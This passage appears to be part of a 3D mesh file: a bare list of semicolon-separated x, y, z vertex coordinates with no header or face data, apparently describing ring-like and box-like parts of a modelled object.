-1.536085;0.824646;-0.920110;, -1.543445;0.862276;-1.023777;, -1.543443;0.862276;-0.920109;, -1.568208;0.897367;-1.023776;, -1.568204;0.897367;-0.920109;, -1.601978;0.946105;-1.023775;, -1.601975;0.946104;-0.920107;, -1.642104;0.902452;-1.023774;, -1.642101;0.902451;-0.920107;, -1.671440;0.871083;-1.023773;, -1.671438;0.871082;-0.920106;, -1.683882;0.834815;-1.023773;, -1.683879;0.834815;-0.920106;, -1.676524;0.797185;-1.023774;, -1.676521;0.797185;-0.920106;, -1.651337;0.768275;-1.023774;, -1.651333;0.768275;-0.920107;, -1.615069;0.755833;-1.023775;, -1.615066;0.755833;-0.920108;, -1.577439;0.763191;-1.023776;, -1.577437;0.763191;-0.920109;, -1.548530;0.788379;-1.023777;, -1.548527;0.788379;-0.920109;, -1.614886;0.938343;-1.023775;, -1.626555;0.915795;-1.023774;, -1.581783;0.912715;-1.023775;, -1.590254;0.936648;-1.023776;, -1.626552;0.915796;-0.920107;, -1.614883;0.938342;-0.920107;, -1.590250;0.936648;-0.920108;, -1.581780;0.912715;-0.920108;, -1.619679;0.927053;-1.023775;, -1.587052;0.924809;-1.023775;, -1.619676;0.927053;-0.920107;, -1.587049;0.924808;-0.920108;, -1.609820;0.944534;-1.023775;, -1.609817;0.944534;-0.920107;, -1.594424;0.943475;-1.023775;, -1.594420;0.943474;-0.920108;, -1.548216;0.860343;-1.027999;, -1.541389;0.825428;-1.027998;, -1.552934;0.791776;-1.027998;, -1.579758;0.768405;-1.027997;, -1.614674;0.761577;-1.027996;, -1.648325;0.773123;-1.027995;, -1.671696;0.799948;-1.027995;, -1.678523;0.834863;-1.027995;, -1.666978;0.868514;-1.027995;, -1.639759;0.897621;-1.027995;, -1.625331;0.910003;-1.027996;, -1.618951;0.920448;-1.027996;, -1.614504;0.930924;-1.027996;, -1.609804;0.936667;-1.027996;, -1.602527;0.938125;-1.027997;, -1.595517;0.935684;-1.027997;, -1.591648;0.929351;-1.027997;, -1.588677;0.918365;-1.027997;, -1.583788;0.907144;-1.027997;, -1.571193;0.892903;-1.027997;, -1.649600;0.799155;-1.018626;, -1.621535;0.778760;-1.019218;, -1.586845;0.778760;-1.019951;, -1.558781;0.799155;-1.020544;, -1.548061;0.832154;-1.020771;, -1.558781;0.865153;-1.020546;, -1.586845;0.885547;-1.019953;, -1.621536;0.885547;-1.019221;, -1.649600;0.865153;-1.018628;, -1.650883;0.799153;-1.079402;, -1.622799;0.778758;-1.079068;, -1.588081;0.778758;-1.078453;, -1.559990;0.799153;-1.077790;, -1.549256;0.832152;-1.077335;, -1.559979;0.865151;-1.077260;, -1.588063;0.885546;-1.077594;, -1.622781;0.885546;-1.078209;, -1.650872;0.865151;-1.078871;, -1.647247;0.800188;-1.143609;, -1.619768;0.779621;-1.132595;, -1.585930;0.779370;-1.116431;, -1.558659;0.799532;-1.101293;, -1.548371;0.832404;-1.092962;, -1.558995;0.865431;-1.094621;, -1.586475;0.885998;-1.105636;, -1.620312;0.886249;-1.121799;, -1.647583;0.866087;-1.136937;, -1.587438;0.812838;-1.197116;, -1.573255;0.789459;-1.174207;, -1.558773;0.785115;-1.140727;, -1.549522;0.801464;-1.109467;, -1.549038;0.832263;-1.092365;, -1.557505;0.865747;-1.095955;, -1.571687;0.889125;-1.118865;, -1.586170;0.893470;-1.152344;, -1.595420;0.877121;-1.183604;, -1.492479;0.832569;-1.200660;, -1.486827;0.807418;-1.177431;, -1.484762;0.800493;-1.143489;, -1.487075;0.814440;-1.111797;, -1.492881;0.843931;-1.094461;, -1.499962;0.877703;-1.098102;, -1.505615;0.902854;-1.121330;, -1.507679;0.909779;-1.155273;, -1.505366;0.895832;-1.186964;, -0.969964;0.941055;-1.200441;, -0.965714;0.915613;-1.177214;, -0.965693;0.908264;-1.143272;, -0.969905;0.921816;-1.111581;, -0.976746;0.951093;-1.094245;, -0.983599;0.984912;-1.097887;, -0.987849;1.010355;-1.121114;, -0.987871;1.017703;-1.155056;, -0.983657;1.004151;-1.186747;, -0.900817;0.955385;-1.194339;, -0.906478;0.927888;-1.171986;, -0.920882;0.917550;-1.139318;, -0.938529;0.928318;-1.108812;, -0.952677;0.956081;-1.092122;, -0.957922;0.990233;-1.095621;, -0.952262;1.017729;-1.117974;, -0.937857;1.028068;-1.150642;, -0.920209;1.017299;-1.181148;, -0.849967;0.965695;-1.137143;, -0.867242;0.935843;-1.127855;, -0.898556;0.922077;-1.114205;, -0.931945;0.929653;-1.101407;, -0.954659;0.955679;-1.094350;, -0.958017;0.990213;-1.095728;, -0.940742;1.020065;-1.105016;, -0.909429;1.033832;-1.118666;, -0.876039;1.026255;-1.131464;, -0.847626;0.965923;-1.078043;, -0.865259;0.936036;-1.077765;, -0.897091;0.922219;-1.077230;, -0.930964;0.929748;-1.076642;, -0.953940;0.955749;-1.076227;, -0.957242;0.990289;-1.076143;, -0.939610;1.020175;-1.076422;, -0.907777;1.033992;-1.076957;, -0.873903;1.026463;-1.077544;, -0.847967;0.965569;-1.013183;, -0.865597;0.935686;-1.013439;, -0.897427;0.921873;-1.013682;, -0.931295;0.929406;-1.013819;, -0.954269;0.955409;-1.013798;, -0.957572;0.989948;-1.013628;, -0.939941;1.019832;-1.013372;, -0.908113;1.033645;-1.013129;, -0.874243;1.026111;-1.012992;, -0.850737;0.994520;-1.013040;, -0.854988;1.004316;-1.013009;, -0.854646;1.004669;-1.077892;, -0.850393;0.994874;-1.077973;, -0.856944;1.004374;-1.137398;, -0.852783;0.994646;-1.138299;, -0.908309;0.993946;-1.195188;, -0.905213;0.984016;-1.197273;, -0.977924;0.979610;-1.201278;, -0.975709;0.969402;-1.203494;, -1.500500;0.871112;-1.201495;, -1.498415;0.860876;-1.203711;, -1.595827;0.851230;-1.197981;, -1.594535;0.840908;-1.200125;, -1.656241;0.838423;-1.143948;, -1.656154;0.827877;-1.145000;, -1.659870;0.837491;-1.079253;, -1.659872;0.826813;-1.079339;, -1.658585;0.837493;-1.018437;, -1.658585;0.826814;-1.018437;, -1.662357;0.826725;-1.018357;, -1.662357;0.837403;-1.018358;, -1.663642;0.837399;-1.079320;, -1.659648;0.838470;-1.145563;, -1.597324;0.851666;-1.201404;, -1.500723;0.871773;-1.205186;, -0.977927;0.980317;-1.204966;, -0.906876;0.994999;-1.198485;, -0.853767;1.005773;-1.138789;, -0.851184;1.006080;-1.077950;, -0.851526;1.005728;-1.012983;, -0.847275;0.995932;-1.013014;, -0.846932;0.996285;-1.078031;, -0.849608;0.996045;-1.139689;, -0.903781;0.985069;-1.200570;, -0.975711;0.970109;-1.207181;, -1.498638;0.861537;-1.207402;, -1.596033;0.841344;-1.203548;, -1.659561;0.827924;-1.146615;, -1.663643;0.826721;-1.079405;, -1.038732;1.084538;0.685057;, -1.038732;0.778166;0.685057;, -1.515799;0.778165;0.740470;, -1.515799;1.084537;0.740470;, -1.515799;0.822548;0.740470;, -1.515799;1.040153;0.740470;, -1.082554;0.778166;0.690147;, -1.471976;0.778165;0.735379;, -1.038732;1.040154;0.685057;, -1.038732;0.822549;0.685057;, -1.471976;1.084537;0.735379;, -1.082554;1.084538;0.690147;, -1.082554;0.822549;0.690147;, -1.082554;1.040154;0.690147;, -1.471976;1.040153;0.735379;, -1.471976;0.822549;0.735379;, -1.483699;1.031391;0.736741;, -1.504075;1.031391;0.739108;, -1.465532;1.071918;0.734631;, -1.465532;1.052772;0.734631;, -1.504075;1.093299;0.739108;, -1.483701;1.093298;0.736741;, -1.522243;1.052772;0.741219;, -1.522243;1.071918;0.741219;, -1.504075;0.831311;0.739108;, -1.483699;0.831311;0.736741;, -1.522243;0.790784;0.741219;, -1.522243;0.809929;0.741219;, -1.483699;0.769403;0.736741;, -1.504075;0.769403;0.739108;, -1.465532;0.809929;0.734631;, -1.465532;0.790784;0.734631;, -1.050456;0.831311;0.686419;, -1.070832;0.831311;0.688785;, -1.089000;0.790784;0.690895;, -1.089000;0.809930;0.690895;, -1.050456;0.769404;0.686419;, -1.070832;0.769404;0.688785;, -1.032288;0.809930;0.684309;, -1.032288;0.790784;0.684309;, -1.070832;1.031392;0.688785;, -1.050456;1.031392;0.686419;, -1.032288;1.071918;0.684309;, -1.032288;1.052773;0.684309;, -1.070833;1.093300;0.688785;, -1.050456;1.093300;0.686419;, -1.089000;1.052773;0.690895;, -1.089000;1.071918;0.690895;, -1.511206;1.040153;0.780017;, -1.499482;1.031391;0.778655;, -1.479106;1.031391;0.776288;, -1.467381;1.040153;0.774926;, -1.460938;1.052772;0.774178;, -1.460938;1.071918;0.774178;, -1.467381;1.084537;0.774926;, -1.479106;1.093299;0.776288;, -1.499482;1.093299;0.778655;, -1.511206;1.084537;0.780017;, -1.517649;1.071918;0.780766;, -1.517649;1.052772;0.780766;, -1.077962;1.040154;0.729694;, -1.066238;1.031392;0.728332;, -1.045863;1.031392;0.725966;, -1.034139;1.040154;0.724604;, -1.027694;1.052773;0.723856;, -1.027694;1.071918;0.723856;, -1.034139;1.084538;0.724604;, -1.045863;1.093300;0.725966;, -1.066238;1.093300;0.728332;, -1.077962;1.084538;0.729694;, -1.084406;1.071918;0.730442;, -1.084406;1.052773;0.730442;, -1.034139;0.822549;0.724604;, -1.045863;0.831311;0.725966;, -1.066238;0.831311;0.728332;, -1.077962;0.822549;0.729694;, -1.084406;0.809930;0.730442;, -1.084406;0.790784;0.730442;, -1.077962;0.778166;0.729694;, -1.066238;0.769404;0.728332;, -1.045863;0.769404;0.725966;, -1.034139;0.778166;0.724604;, -1.027694;0.790784;0.723856;, -1.027694;0.809930;0.723856;, -1.467381;0.822549;0.774926;, -1.479106;0.831311;0.776288;, -1.499482;0.831311;0.778656;, -1.511206;0.822548;0.780017;, -1.517649;0.809929;0.780766;, -1.517649;0.790784;0.780766;, -1.511206;0.778165;0.780017;, -1.499482;0.769403;0.778656;, -1.479106;0.769403;0.776288;, -1.467381;0.778165;0.774926;, -1.460938;0.790784;0.774178;, -1.460938;0.809929;0.774178;, -1.503411;1.076493;0.779112;, -1.507301;1.068876;0.779563;, -1.507301;1.055814;0.779563;, -1.503411;1.048197;0.779112;, -1.496327;1.042903;0.778289;, -1.482259;1.042903;0.776655;, -1.475176;1.048197;0.775832;, -1.471287;1.055814;0.775380;, -1.471287;1.068876;0.775380;, -1.475176;1.076493;0.775832;, -1.482259;1.081787;0.776655;, -1.496327;1.081787;0.778289;, -1.070167;1.076494;0.728789;, -1.074058;1.068877;0.729240;, -1.074058;1.055814;0.729240;, -1.070167;1.048197;0.728789;, -1.063084;1.042904;0.727966;, -1.049017;1.042904;0.726332;, -1.041934;1.048197;0.725509;, -1.038044;1.055814;0.725058;, -1.038044;1.068877;0.725058;, -1.041934;1.076494;0.725509;, -1.049017;1.081788;0.726332;, -1.063084;1.081788;0.727966;, -1.041934;0.786210;0.725509;, -1.038044;0.793826;0.725058;, -1.038044;0.806889;0.725058;, -1.041934;0.814505;0.725509;, -1.049017;0.819799;0.726332;, -1.063084;0.819799;0.727966;, -1.070167;0.814505;0.728789;, -1.074058;0.806889;0.729240;, -1.074058;0.793826;0.729240;, -1.070167;0.786210;0.728789;, -1.063084;0.780916;0.727966;, -1.049017;0.780916;0.726332;, -1.475176;0.786209;0.775832;, -1.471287;0.793825;0.775380;, -1.471287;0.806888;0.775380;, -1.475176;0.814505;0.775832;, -1.482260;0.819799;0.776655;, -1.496327;0.819799;0.778289;, -1.503411;0.814505;0.779112;, -1.507301;0.806888;0.779563;, -1.507301;0.793825;0.779563;, -1.503411;0.786209;0.779112;, -1.496327;0.780915;0.778289;, -1.482259;0.780915;0.776655;, -1.473916;1.076493;0.786677;, -1.480999;1.081787;0.787500;, -1.495068;1.081787;0.789134;, -1.502151;1.076493;0.789957;, -1.506041;1.068876;0.790409;, -1.506041;1.055814;0.790409;, -1.502151;1.048197;0.789957;, -1.495068;1.042903;0.789134;, -1.480999;1.042903;0.787500;, -1.473916;1.048197;0.786677;, -1.470027;1.055814;0.786226;, -1.470027;1.068876;0.786226;, -1.040674;1.076494;0.736355;, -1.047757;1.081788;0.737178;, -1.061824;1.081788;0.738811;, -1.068908;1.076494;0.739634;, -1.072798;1.068877;0.740086;, -1.072798;1.055814;0.740086;, -1.068908;1.048197;0.739634;, -1.061824;1.042904;0.738811;, -1.047757;1.042904;0.737178;, -1.040674;1.048197;0.736355;, -1.036784;1.055814;0.735903;, -1.036784;1.068877;0.735903;, -1.068908;0.786210;0.739634;, -1.061824;0.780916;0.738811;, -1.047757;0.780916;0.737178;, -1.040674;0.786210;0.736355;, -1.036784;0.793826;0.735903;, -1.036784;0.806889;0.735903;, -1.040674;0.814505;0.736355;, -1.047757;0.819799;0.737178;, -1.061824;0.819799;0.738811;, -1.068908;0.814505;0.739634;, -1.072798;0.806889;0.740086;, -1.072798;0.793826;0.740086;, -1.502151;0.786209;0.789957;, -1.495068;0.780915;0.789134;, -1.480999;0.780915;0.787500;, -1.473916;0.786209;0.786677;, -1.470027;0.793825;0.786226;, -1.470027;0.806888;0.786226;, -1.473916;0.814505;0.786677;, -1.480999;0.819799;0.787500;, -1.495068;0.819799;0.789134;, -1.502151;0.814505;0.789957;, -1.506040;0.806888;0.790409;, -1.506040;0.793825;0.790409;, -1.523280;0.793825;0.641992;, -1.523280;0.806888;0.641992;, -1.519390;0.814505;0.641540;, -1.512307;0.819799;0.640718;, -1.498239;0.819799;0.639084;, -1.491155;0.814505;0.638261;, -1.487265;0.806888;0.637809;, -1.487265;0.793825;0.637809;, -1.491155;0.786209;0.638261;, -1.498239;0.780915;0.639084;, -1.512307;0.780915;0.640718;, -1.519390;0.786209;0.641540;, -1.090037;0.793826;0.591670;, -1.090037;0.806889;0.591670;, -1.086147;0.814505;0.591218;, -1.079064;0.819799;0.590395;, -1.064996;0.819799;0.588761;, -1.057913;0.814505;0.587938;, -1.054024;0.806889;0.587486;, -1.054024;0.793826;0.587486;, -1.057913;0.786210;0.587938;, -1.064996;0.780916;0.588761;, -1.079064;0.780916;0.590395;, -1.086147;0.786210;0.591218;, -1.054024;1.068877;0.587486;, -1.054024;1.055814;0.587486;, -1.057913;1.048197;0.587938;, -1.064996;1.042904;0.588761;, -1.079064;1.042904;0.590395;, -1.086147;1.048197;0.591218;, -1.090037;1.055814;0.591670;, -1.090037;1.068877;0.591670;, -1.086147;1.076494;0.591218;, -1.079064;1.081788;0.590395;, -1.064996;1.081788;0.588761;, -1.057913;1.076494;0.587938;, -1.487265;1.068876;0.637809;, -1.487265;1.055814;0.637809;, -1.491155;1.048197;0.638261;, -1.498239;1.042903;0.639084;, -1.512307;1.042903;0.640718;, -1.519390;1.048197;0.641540;, -1.523280;1.055814;0.641992;, -1.523280;1.068876;0.641992;, -1.519390;1.076493;0.641540;, -1.512307;1.081787;0.640718;, -1.498239;1.081787;0.639084;, -1.491155;1.076493;0.638261;, -1.496979;0.780915;0.649929;, -1.511047;0.780915;0.651563;, -1.518130;0.786209;0.652386;, -1.522020;0.793825;0.652838;, -1.522020;0.806888;0.652838;, -1.518130;0.814505;0.652386;, -1.511047;0.819799;0.651563;, -1.496979;0.819799;0.649929;, -1.489896;0.814505;0.649107;, -1.486007;0.806888;0.648655;, -1.486007;0.793825;0.648655;, -1.489896;0.786209;0.649107;, -1.063737;0.780916;0.599606;, -1.077804;0.780916;0.601240;, -1.084887;0.786210;0.602063;, -1.088777;0.793826;0.602515;, -1.088777;0.806889;0.602515;, -1.084887;0.814505;0.602063;, -1.077804;0.819799;0.601240;, -1.063737;0.819799;0.599606;, -1.056653;0.814505;0.598783;, -1.052764;0.806889;0.598332;, -1.052764;0.793826;0.598332;, -1.056653;0.786210;0.598783;, -1.077804;1.081788;0.601240;, -1.063737;1.081788;0.599606;, -1.056653;1.076494;0.598783;, -1.052764;1.068877;0.598332;, -1.052764;1.055814;0.598332;, -1.056653;1.048197;0.598783;, -1.063737;1.042904;0.599606;, -1.077804;1.042904;0.601240;, -1.084887;1.048197;0.602063;, -1.088777;1.055814;0.602515;, -1.088777;1.068877;0.602515;, -1.084887;1.076494;0.602063;, -1.511047;1.081787;0.651563;, -1.496979;1.081787;0.649929;, -1.489896;1.076493;0.649107;, -1.486007;1.068876;0.648655;, -1.486007;1.055814;0.648655;, -1.489896;1.048197;0.649107;, -1.496979;1.042903;0.649929;, -1.511047;1.042903;0.651563;, -1.518130;1.048197;0.652386;, -1.522020;1.055814;0.652838;, -1.522020;1.068876;0.652838;, -1.518130;1.076493;0.652386;, -1.475657;0.809929;0.647453;, -1.475657;0.790784;0.647453;, -1.482101;0.778165;0.648202;, -1.493826;0.769403;0.649563;, -1.514201;0.769403;0.651930;, -1.525925;0.778165;0.653291;, -1.532369;0.790784;0.654040;, -1.532369;0.809929;0.654040;, -1.525925;0.822548;0.653291;, -1.514201;0.831311;0.651930;, -1.493826;0.831311;0.649563;, -1.482101;0.822549;0.648202;, -1.042415;0.809930;0.597129;, -1.042415;0.790784;0.597129;, -1.048858;0.778166;0.597878;, -1.060583;0.769404;0.599240;, -1.080958;0.769404;0.601607;, -1.092682;0.778166;0.602969;, -1.099125;0.790784;0.603717;, -1.099126;0.809930;0.603717;, -1.092682;0.822549;0.602969;, -1.080958;0.831311;0.601607;, -1.060583;0.831311;0.599240;, -1.048858;0.822549;0.597878;, -1.099125;1.052773;0.603717;, -1.099125;1.071918;0.603717;, -1.092682;1.084538;0.602969;, -1.080958;1.093300;0.601607;, -1.060583;1.093300;0.599240;, -1.048858;1.084538;0.597878;, -1.042415;1.071918;0.597129;, -1.042415;1.052773;0.597129;, -1.048858;1.040154;0.597878;, -1.060583;1.031392;0.599240;, -1.080958;1.031392;0.601607;, -1.092682;1.040154;0.602969;, -1.532369;1.052772;0.654040;, -1.532369;1.071918;0.654040;, -1.525925;1.084537;0.653291;, -1.514201;1.093299;0.651930;, -1.493826;1.093299;0.649563;, -1.482101;1.084537;0.648202;, -1.475657;1.071918;0.647453;, -1.475657;1.052772;0.647453;, -1.482101;1.040153;0.648202;, -1.493826;1.031391;0.649563;, -1.514201;1.031391;0.651930;, -1.525925;1.040153;0.653291;, -1.094000;1.071918;0.647845;, -1.094000;1.052773;0.647845;, -1.055456;1.093300;0.643368;, -1.075833;1.093300;0.645734;, -1.037288;1.052773;0.641257;, -1.037288;1.071918;0.641257;, -1.055456;1.031392;0.643368;, -1.075832;1.031392;0.645735;, -1.037288;0.790784;0.641257;, -1.037288;0.809930;0.641257;, -1.075832;0.769404;0.645735;, -1.055456;0.769404;0.643368;, -1.094000;0.809930;0.647845;, -1.094000;0.790784;0.647845;, -1.075832;0.831311;0.645735;, -1.055456;0.831311;0.643368;, -1.470531;0.790784;0.691581;, -1.470531;0.809929;0.691581;, -1.509075;0.769403;0.696057;, -1.488700;0.769403;0.693691;, -1.527244;0.809929;0.698167;, -1.527244;0.790784;0.698167;, -1.488700;0.831311;0.693691;, -1.509075;0.831311;0.696057;, -1.527244;1.071918;0.698167;, -1.527244;1.052772;0.698167;, -1.488701;1.093298;0.693690;, -1.509075;1.093299;0.696057;, -1.470531;1.052772;0.691581;, -1.470531;1.071918;0.691581;, -1.509075;1.031391;0.696057;, -1.488700;1.031391;0.693691;, -1.476976;0.822549;0.692329;, -1.476976;1.040153;0.692329;, -1.087556;1.040154;0.647096;, -1.087556;0.822549;0.647096;, -1.087556;1.084538;0.647096;, -1.476976;1.084537;0.692329;, -1.043732;0.822549;0.642006;, -1.043732;1.040154;0.642006;, -1.476976;0.778165;0.692329;, -1.087556;0.778166;0.647096;, -1.520800;1.040153;0.697419;, -1.520800;0.822548;0.697419;, -1.520800;1.084537;0.697419;, -1.520800;0.778165;0.697419;, -1.043732;0.778166;0.642006;, -1.043732;1.084538;0.642006;, -1.094019;1.093300;0.647871;, -1.436872;1.086203;0.731052;, -1.454471;1.086204;0.771398;, -1.394921;1.086203;0.766244;, -1.419191;1.086203;0.729522;, -1.455623;1.086204;0.760980;, -1.454130;1.086204;0.750334;, -1.448577;1.086204;0.739336;, -1.395576;1.086203;0.755784;, -1.398877;1.086203;0.745552;, -1.406236;1.086203;0.735672;, -1.454132;0.878259;0.750333;, -1.448581;0.878259;0.739335;, -1.436876;0.878259;0.731050;, -1.419193;0.878259;0.729520;, -1.406239;0.878259;0.735670;, -1.398880;0.878259;0.745551;, -1.395579;0.878259;0.755782;, -1.394925;0.878259;0.766243;, -1.454475;0.878259;0.771397;, -1.455626;0.878259;0.760979;, -0.791178;1.022667;0.131866;, -0.791183;1.022667;-0.065457;, -0.791200;1.022667;-0.692192;, -0.791204;1.022667;-0.889515;, -0.791189;1.022667;-0.280679;, -0.791194;1.022667;-0.475152;, -0.783907;0.969771;0.159657;, -0.783914;0.969771;-0.093844;, -0.783928;0.969771;-0.664397;, -0.783936;0.969771;-0.917918;, -0.783917;0.969770;-0.253547;, -0.783925;0.969771;-0.502879;, -0.791185;0.917031;-0.929572;, -0.791177;0.917031;-0.652743;, -0.791164;0.917031;-0.105497;, -0.791155;0.917031;0.171311;, -0.791175;0.917028;-0.514498;, -0.791167;0.917028;-0.241928;, -0.804399;1.046573;-0.837480;, -0.804396;1.046573;-0.744822;, -0.804388;1.046573;-0.424042;, -0.804385;1.046573;-0.333663;, -0.804377;1.046573;-0.013422;, -0.804374;1.046573;0.079236;, -0.612672;0.892489;-0.929576;, -0.605422;0.945229;-0.917923;, -0.598418;0.996164;-0.889520;, -0.595438;1.017846;-0.837486;, -0.595436;1.017846;-0.744828;, -0.598415;0.996164;-0.692197;, -0.605415;0.945229;-0.664402;, -0.612665;0.892489;-0.652747;, -0.598408;0.996164;-0.475157;, -0.595426;1.017847;-0.424048;, -0.595423;1.017847;-0.333669;, -0.598403;0.996165;-0.280684;, -0.605403;0.945230;-0.253552;, -0.612654;0.892488;-0.241933;, -0.612660;0.892488;-0.514502;, -0.605411;0.945230;-0.502884;, -0.612651;0.892490;-0.105502;, -0.605400;0.945230;-0.093849;, -0.598397;0.996165;-0.065462;, -0.595414;1.017847;-0.013427;, -0.595412;1.017847;0.079231;, -0.598392;0.996165;0.131862;, -0.605393;0.945230;0.159653;, -0.612643;0.892490;0.171306;, -0.804508;0.894115;0.166548;, -0.615983;0.868198;0.166543;, -0.615990;0.868198;-0.100738;, -0.804516;0.894115;-0.100733;, -0.804519;0.894114;-0.246691;, -0.615993;0.868197;-0.246696;, -0.615999;0.868197;-0.509739;, -0.804526;0.894114;-0.509734;, -0.804529;0.894115;-0.657506;, -0.616004;0.868197;-0.657511;, -0.616010;0.868197;-0.924813;, -0.804537;0.894115;-0.924808;, -0.812149;1.058675;0.171884;, -0.824801;1.059020;0.184440;, -0.829058;1.069173;0.167749;, -0.789876;1.021473;0.192265;, -0.797600;0.971294;0.206524;, -0.783906;0.969776;0.196878;, -0.790551;0.918200;0.192326;, -0.802545;0.918781;0.204342;, -0.824416;0.881614;0.184273;, -0.813410;0.878838;0.174834;, -0.829058;0.872030;0.167749;, -1.192116;0.894743;0.167758;, -0.829071;1.069173;-0.310352;, -0.813377;1.061086;-0.310352;, -0.829062;1.069173;-0.021838;, -0.813369;1.061086;-0.021839;, -0.829058;1.069173;0.120961;, -0.812039;1.058741;0.120961;, -1.191831;1.096092;-0.925413;, -1.202950;1.085695;-0.929904;, -1.191726;1.086268;-0.942144;, -0.829086;1.069173;-0.925423;, -0.824831;1.059020;-0.942114;, -0.812177;1.058675;-0.929559;, -0.829084;1.069173;-0.878634;, -0.812066;1.058741;-0.878635;, -0.829082;1.069173;-0.735835;, -0.813387;1.061086;-0.735836;, -0.829073;1.069173;-0.447322;, -0.813379;1.061086;-0.447322;, -0.829087;0.872030;-0.925423;, -0.813439;0.878838;-0.932704;, -0.824444;0.881614;-0.941947;, -1.203107;0.910992;-0.929901;, -1.191833;0.898934;-0.925413;, -1.191872;0.908864;-0.941938;, -0.790596;0.918160;-0.950154;, -0.802574;0.918781;-0.962018;, -1.192147;0.945031;-0.961204;, -1.203345;0.949120;-0.950216;, -1.191830;0.997589;-0.965771;, -1.203031;0.998353;-0.954542;, -1.191498;1.050222;-0.961166;, -1.202702;1.047681;-0.950180;, -0.783937;0.969776;-0.954553;, -0.795138;0.970541;-0.965781;, -0.789907;1.021473;-0.949940;, -0.801955;1.021020;-0.962450;, -1.191806;1.096093;-0.069465;, -1.192091;0.895216;-0.069465;, -1.154515;1.083507;0.184484;, -1.157223;0.997982;0.201472;, -1.154484;0.944899;0.203625;, -1.154699;0.906110;0.184282;, -1.191683;1.096084;0.167738;, -1.392391;0.886481;0.690626;, -1.318164;0.881427;0.682039;, -1.212420;0.874229;0.669805;, -1.201067;1.078656;-0.086570;, -1.202210;1.085166;-0.116906;, -1.199660;1.089173;-0.084127;, -1.262544;1.099226;0.016110;, -1.284481;1.072859;0.001833;, -1.339062;1.104895;0.132231;, -1.364183;1.078742;0.118242;, -1.394156;1.108978;0.249104;, -1.421599;1.083003;0.240048;, -1.409595;1.110656;0.364711;, -1.434962;1.084516;0.362392;, -1.405262;1.110428;0.403362;, -1.433821;1.084438;0.405073;, -1.373930;1.061233;0.641447;, -1.401961;1.035239;0.645927;, -1.410139;0.907735;0.403631;, -1.437044;0.937662;0.405251;, -1.403610;0.915247;0.646255;, -1.376768;0.885316;0.641993;, -1.414545;0.908027;0.364460;, -1.438901;0.937879;0.362393;, -1.399611;0.906708;0.249098;, -1.425555;0.936691;0.240050;, -1.344647;0.903220;0.132524;, -1.368124;0.933041;0.118245;, -1.263642;0.897967;0.016620;, -1.285542;0.927648;0.001830;, -1.200161;0.895789;-0.082401;, -1.204159;0.908969;-0.114778;, -1.202321;0.912169;-0.086135;, -1.388867;1.062562;0.690220;, -1.420220;1.036820;0.693847;, -1.420186;0.916450;0.693842;, -1.410916;0.887742;0.692769;, -1.166895;1.094245;0.167751;, -1.126508;1.091247;0.167757;, -1.154507;1.090053;0.173332;, -1.199423;1.066815;0.225202;, -1.224553;1.097010;0.211982;, -1.240725;1.098584;0.313832;, -1.212554;1.068309;0.317245;, -1.207979;1.069737;0.389991;, -1.235842;1.099881;0.391665;, -1.178594;1.020543;0.608803;, -1.204453;1.049719;0.621544;, -1.150255;1.017271;0.662611;, -1.182330;1.047705;0.666322;, -1.177638;0.901587;0.608719;, -1.202624;0.875285;0.622194;, -1.160073;0.871063;0.663745;, -1.146968;0.898219;0.662229;, -1.208402;0.924007;0.390004;, -1.236441;0.897828;0.391681;, -1.241297;0.896785;0.313844;, -1.212957;0.922837;0.317254;, -1.199807;0.921600;0.225207;, -1.225095;0.895498;0.211985;, -1.154904;0.896854;0.173265;, -1.126989;0.890491;0.167757;, -1.167375;0.893065;0.167758;, -1.231228;1.087627;0.436621;, -1.227053;1.077456;0.455511;, -1.398344;1.088648;0.468026;, -1.401045;1.098496;0.445493;, -1.429530;1.072505;0.447205;, -1.426333;1.067924;0.470795;, -1.199356;1.053226;0.449243;, -1.203659;1.057805;0.432122;, -1.201516;1.001269;0.223601;, -1.199288;0.948224;0.225206;, -1.212235;1.002585;0.317250;, -1.212322;0.949711;0.317249;, -1.208206;1.086311;0.221451;, -1.221944;1.087869;0.316012;, -1.217173;1.089203;0.390560;, -1.212696;1.077108;0.434353;, -1.208450;1.069143;0.452649;, -1.187119;1.039651;0.613765;, -1.162714;1.036316;0.664052;, -1.277485;1.090596;0.006668;, -1.355320;1.096601;0.122938;, -1.411923;1.100799;0.243046;, -1.426893;1.102099;0.363149;, -1.423821;1.102195;0.405131;, -1.419450;1.090170;0.447992;, -1.416468;1.082351;0.471338;, -1.392284;1.053005;0.644208;, -1.407829;1.053755;0.692414;, -1.278937;0.908528;0.007070;, -1.360568;0.913751;0.123114;, -1.417117;0.917330;0.243097;, -1.431713;0.918856;0.363067;, -1.428365;0.918375;0.405034;, -1.395023;0.896000;0.643750;, -1.420892;0.900354;0.693924;, -1.208933;0.903805;0.221231;, -1.222807;0.905034;0.316142;, -1.218041;0.906191;0.390288;, -1.186486;0.883703;0.612976;, -1.148351;0.882118;0.662389;, -0.791310;0.918369;0.317465;, -0.788867;0.971133;0.317316;, -0.803641;1.023870;0.203251;, -1.154550;1.049122;0.202746;, -1.199501;1.051164;0.225203;, -1.212647;1.049255;0.317247;, -0.355372;0.846345;0.199864;, -0.358712;0.822053;0.195101;, -0.358719;0.822053;-0.072180;, -0.355381;0.846345;-0.076944;, -0.348130;0.899085;-0.065291;, -0.341127;0.950019;-0.036904;, -0.338145;0.971701;0.015131;, -0.338142;0.971701;0.107788;, -0.341121;0.950019;0.160419;, -0.348123;0.899085;0.188210;, -0.355384;0.846343;-0.213375;, -0.358725;0.822052;-0.218138;, -0.358729;0.822052;-0.481181;, -0.355391;0.846343;-0.485944;, -0.348140;0.899085;-0.474326;, -0.341138;0.950019;-0.446599;, -0.338154;0.971701;-0.395490;, -0.338153;0.971701;-0.305111;, -0.341132;0.950019;-0.252126;, -0.348135;0.899085;-0.224994;, -0.355394;0.846345;-0.624190;, -0.358733;0.822054;-0.628953;, -0.358739;0.822054;-0.896255;, -0.355402;0.846345;-0.901019;, -0.348151;0.899085;-0.889365;, -0.341148;0.950020;-0.860962;, -0.338166;0.971702;-0.808928;, -0.338163;0.971702;-0.716270;, -0.341142;0.950020;-0.663639;, -0.348145;0.899085;-0.635844;, -0.288847;0.952614;0.114599;, -0.294149;0.931380;0.167229;, -0.306603;0.881497;0.195021;, -0.319499;0.829847;0.206675;, -0.325439;0.809829;0.201911;, -0.325447;0.809830;-0.065370;, -0.319508;0.829847;-0.070133;, -0.306608;0.881497;-0.058480;, -0.294156;0.931380;-0.030094;, -0.288850;0.952614;0.021941;, -0.288859;0.952614;-0.298301;, -0.294160;0.931380;-0.245315;, -0.306613;0.881497;-0.218184;, -0.319511;0.829845;-0.206564;, -0.325450;0.809829;-0.211328;, 